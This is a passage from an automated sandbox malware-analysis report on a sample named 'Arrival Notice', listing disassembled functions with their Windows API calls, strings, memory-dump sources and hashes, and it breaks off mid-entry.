Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25

Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045D79D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C

Strings

\VH, xrefs: 0045D7F6

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID: \VH
API String ID: 1682464887-234962358
Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64

Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045D79D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C

Strings

\VH, xrefs: 0045D7F6

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID: \VH
API String ID: 1682464887-234962358
Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94

Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045D87B
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A

Strings

\VH, xrefs: 0045D8D4

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID: \VH
API String ID: 1682464887-234962358
Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94

Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045D37E
GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437

Strings

\VH, xrefs: 0045D3C0

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: \VH
API String ID: 2507767853-234962358
Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54

Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045D55C
GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608

Strings

\VH, xrefs: 0045D59E

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: \VH
API String ID: 2507767853-234962358
Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58

Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F

Strings

msctls_trackbar32, xrefs: 00450B10

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8

Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

CLSIDFromString.OLE32(?,00000000), ref: 00435236
SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4

Strings

crts, xrefs: 00435292

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
String ID: crts
API String ID: 943502515-3724388283
Opcode ID: 980354a1e725ddff6be093d26cfad83e9eaf79299ee4a5b53f79d1194df6727a
Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
Opcode Fuzzy Hash: 980354a1e725ddff6be093d26cfad83e9eaf79299ee4a5b53f79d1194df6727a
Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94

Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
SetErrorMode.KERNEL32(?), ref: 0045D35C

Strings

\VH, xrefs: 0045D314

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ErrorMode$LabelVolume
String ID: \VH
API String ID: 2006950084-234962358
Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5

Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

GetMenuItemInfoW.USER32 ref: 00449727
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
DrawMenuBar.USER32 ref: 00449761

Strings

0, xrefs: 00449709

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Menu$InfoItem$Draw_malloc
String ID: 0
API String ID: 772068139-4108050209
Opcode ID: 844eb499e32ceec114fe8db52b48e8b0513a0dd8f20e481ba683b0b5f402916a
Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
Opcode Fuzzy Hash: 844eb499e32ceec114fe8db52b48e8b0513a0dd8f20e481ba683b0b5f402916a
Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5

Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 00472A37
_wcslen.LIBCMT ref: 00472A47
_wcslen.LIBCMT ref: 00472A8D

Strings

3, 3, 8, 1, xrefs: 00472A31

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _wcslen$_wcscpy
String ID: 3, 3, 8, 1
API String ID: 3469035223-357260408
Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99

Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0

Strings

IcmpCloseHandle, xrefs: 004312EA
ICMP.DLL, xrefs: 004312D9

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: ICMP.DLL$IcmpCloseHandle
API String ID: 2574300362-3530519716
Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8

Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322

Strings

IcmpCreateFile, xrefs: 0043131C
ICMP.DLL, xrefs: 0043130B

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: ICMP.DLL$IcmpCreateFile
API String ID: 2574300362-275556492
Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8

Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE

Strings

IcmpSendEcho, xrefs: 004312B8
ICMP.DLL, xrefs: 004312A7

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: ICMP.DLL$IcmpSendEcho
API String ID: 2574300362-58917771
Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8

Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3

Strings

RegDeleteKeyExW, xrefs: 00430C9D
advapi32.dll, xrefs: 00430C8C

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8

Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0047950F
SysAllocString.OLEAUT32(00000000), ref: 004795D8
VariantCopy.OLEAUT32(?,?), ref: 0047960F
VariantClear.OLEAUT32(?), ref: 00479650

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA

Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
__itow.LIBCMT ref: 004699CD

Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2

SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
__itow.LIBCMT ref: 00469A97

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: c3a956d33284f2c9f3f86cb058cc2767b53d45f45b0f3b019056d4494472ccb7
Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
Opcode Fuzzy Hash: c3a956d33284f2c9f3f86cb058cc2767b53d45f45b0f3b019056d4494472ccb7
